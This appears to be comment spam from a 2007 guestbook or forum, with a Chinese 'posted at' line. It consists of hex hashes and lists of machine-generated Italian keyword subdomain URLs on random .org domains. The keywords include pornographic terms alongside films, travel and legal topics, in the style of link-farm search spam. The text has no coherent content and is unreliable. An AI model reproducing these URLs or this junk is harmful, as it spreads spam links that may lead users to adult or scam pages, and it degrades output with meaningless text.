7908c9a46a39e096e6aa05cd35db0327 http://site-www-governo-it-prodi-papa.xxcgwu.org/ http://tutto-sesso-san-vito-custonaci.okhyez.org/ http://bed-and-breakfast-peschiera-del-garda.rivotb.org/ http://nel-nome-della-rosa-film-dvd.yvzcyb.org/ http://guarda-foto-ragazza-nuda-bionda.hivfbp.org/ http://aspetti-negativi-dell-era-computer.rivotb.org/ http://servizio-gara-d-appalto-gratis.kiyytw.org/ http://video-sborrate-e-ingoio-gratis.xxcgwu.org/ http://corso-lingua-cinese-roma-viterbo.kiyytw.org/ http://quadro-astratti-occhio-piu-grande-dell.xxcgwu.org/ 416778d26f8af0e18aadb8d947bc0aec
190.6.25.* 于 2007-06-12 02:49:56发表:
71029471b42ee1b172121bdcc4adb838 http://decreto-ministero-giustizia-4-4-2001.cckzfi.org/ http://pallavolo-foiano-under-18-m.cckzfi.org/ http://stoccolma-miss-mary-of-sweden.hzuhtu.org/ http://back-stage-chiave-tinto-brass.dtufrq.org/ http://mercatino-dell-usato-verona-it.cckzfi.org/ http://testo-tradotto-the-wall-pink-floyd.hzuhtu.org/ http://giocare-gratis-online-the-sims-2.ljiwrk.org/ http://lamincards-dragon-ball-z-gogeta.uoyrgt.org/ http://valle-d-aosta-last-minute-natale.guqsuy.org/ http://libro-il-diario-di-anna-frank.ljiwrk.org/ 3ebbdc0c5c788c89d957115fc277340d